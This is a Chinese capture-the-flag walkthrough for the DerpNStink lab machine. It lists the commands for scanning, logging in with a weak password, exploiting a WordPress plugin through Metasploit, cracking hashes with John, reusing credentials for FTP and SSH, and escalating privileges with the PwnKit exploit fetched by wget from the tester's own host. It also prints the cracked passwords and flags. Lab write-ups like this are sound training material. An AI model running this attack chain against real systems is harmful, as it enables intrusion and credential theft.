信息收集
主机发现
arp-scan -l
端口扫描
nmap -p- 192.168.164.171
访问80端口
查看源代码发现
flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)
访问http://192.168.164.171/webnotes/info.txt
按提示修改hosts文件
192.168.164.171 derpnstink.local
目录扫描
dirb http://192.168.164.171/
并扫到后台目录
尝试弱口令admin/admin登录成功
漏洞探测
使用wpscan扫描
wpscan --url http://derpnstink.local/weblog/
发现版本为WordPress version 4.6.21 identified,slideshow-gallery是wordpress的plugin
漏洞利用
在msf中搜索相关exp
search SlideShow Gallery
参数设置
利用Python获取交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
在网站目录下找到了wp-config配置文件,获取到了账号密码
目录扫描时还发现了phpmyadmin
登录phpmyadmin
发现flag2
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
发现用户unclestinky
使用John破解密码
将加密的密码放到txt中
john /root/hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
密码为wedgie57
使用unclestinky/wedgie57进行登录
在home目录下发现了两个其他用户
尝试使用现有的密码登录ftp,发现使用stinky/wedgie57登录成功
发现一个key.txt文件
cd files/ssh/ssh/ssh/ssh/ssh/ssh/ssh
下载查看
get key.txt
是ssh的密匙
ssh -i key.txt stinky@192.168.164.171 -o PubkeyAcceptedKeyTypes=+ssh-rsa
成功连接
获取到flag3
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
提权
使用cve-2021-4034-poc.c提权
python -m http.server 8888
wget http://192.168.164.134:8888/cve-2021-4034-poc.c
gcc cve-2021-4034-poc.c -o cve-2021-4034
chmod +x cve-2021-4034
./cve-2021-4034